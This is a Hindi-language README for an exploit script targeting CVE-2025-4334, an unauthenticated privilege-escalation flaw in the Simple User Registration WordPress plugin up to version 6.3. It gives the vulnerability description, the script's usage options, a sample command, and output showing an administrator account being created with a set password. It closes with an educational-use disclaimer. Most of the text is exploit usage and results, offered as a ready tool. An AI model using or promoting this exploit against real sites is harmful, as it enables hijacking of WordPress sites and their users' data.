
सरल उपयोगकर्ता पंजीकरण <= 6.3 - अनप्रमाणित विशेषाधिकार वृद्धि
WordPress के लिए Simple User Registration प्लगइन 6.3 तक (और सहित) सभी संस्करणों में विशेषाधिकार वृद्धि के प्रति संवेदनशील है।
यह पंजीकरण के दौरान प्रदान किए जा सकने वाले उपयोगकर्ता मेटा मानों पर अपर्याप्त प्रतिबंधों के कारण है।
यह अप्रमाणित हमलावरों के लिए व्यवस्थापक के रूप में पंजीकरण करना संभव बनाता है।
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hयह शोषण निकाले गए नॉन्स, फ़ॉर्म ID और रेफ़रर का उपयोग करके फ़ॉर्म सबमिशन के माध्यम से विशेषाधिकार वृद्धि को स्वचालित करता है।
python CVE-2025-4334.py -h
usage: CVE-2025-4334.py [-h] -u URL --form FORM
Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Base WordPress URL (e.g. http://localhost/wordpress/)
--form FORM Full URL of the page that contains the registration form
-u → बेस WordPress इंस्टॉलेशन (उदा. http://localhost/wordpress/)--form → संवेदनशील पंजीकरण फ़ॉर्म का पूरा URL (उदा. http://localhost/wpr/default-registration/)python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/
[i] Extracted Nonce : ffcf0140a8
[i] Extracted Form ID : 76
[i] Referer Path : /wpr/default-registration/
[i] HTTP Response Code : 200
[i] Server Response : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}
[+] Exploitation Successful
[+] Username : Nxploitedadmin
[+] First Name : Nxploitedadmin
[+] Last Name : Nxploitedadmin
[+] Email : [email protected]
[+] Password : nxp1234
[+] Role : administrator
Exploit By : Khaled_alenazi (Nxploited)
यह स्क्रिप्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान की गई है।
लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
द्वारा: Khaled_alenazi (Nxploited)